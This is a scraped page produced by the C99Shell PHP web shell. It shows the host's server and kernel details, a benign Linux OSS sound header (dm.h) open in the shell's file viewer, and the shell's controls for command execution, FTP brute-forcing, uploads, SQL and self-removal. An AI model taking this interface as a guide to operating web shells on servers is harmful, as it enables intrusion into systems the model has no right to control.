!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/usr/src/linux-2.4.18-xfs-1.1/drivers/sound/   drwxr-xr-x
Free 318.37 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     dm.h (1.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#ifndef _DRIVERS_SOUND_DM_H
#define _DRIVERS_SOUND_DM_H

/*
 *    Definitions of the 'direct midi sound' interface used
 *    by the newer commercial OSS package. We should export
 *    this to userland somewhere in glibc later.
 */

/*
 * Data structure composing an FM "note" or sound event.
 */

struct dm_fm_voice
{
    u8 op;
    u8 voice;
    u8 am;
    u8 vibrato;
    u8 do_sustain;
    u8 kbd_scale;
    u8 harmonic;
    u8 scale_level;
    u8 volume;
    u8 attack;
    u8 decay;
    u8 sustain;
    u8 release;
    u8 feedback;
    u8 connection;
    u8 left;
    u8 right;
    u8 waveform;
};

/*
 *    This describes an FM note by its voice, octave, frequency number (10bit)
 *    and key on/off.
 */

struct dm_fm_note
{
    u8 voice;
    u8 octave;
    u32 fnum;
    u8 key_on;
};

/*
 * FM parameters that apply globally to all voices, and thus are not "notes"
 */

struct dm_fm_params
{
    u8 am_depth;
    u8 vib_depth;
    u8 kbd_split;
    u8 rhythm;

    /* This block is the percussion instrument data */
    u8 bass;
    u8 snare;
    u8 tomtom;
    u8 cymbal;
    u8 hihat;
};

/*
 *    FM mode ioctl settings
 */
 
#define FM_IOCTL_RESET        0x20
#define FM_IOCTL_PLAY_NOTE    0x21
#define FM_IOCTL_SET_VOICE    0x22
#define FM_IOCTL_SET_PARAMS   0x23
#define FM_IOCTL_SET_MODE     0x24
#define FM_IOCTL_SET_OPL      0x25

#endif

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0308 ]--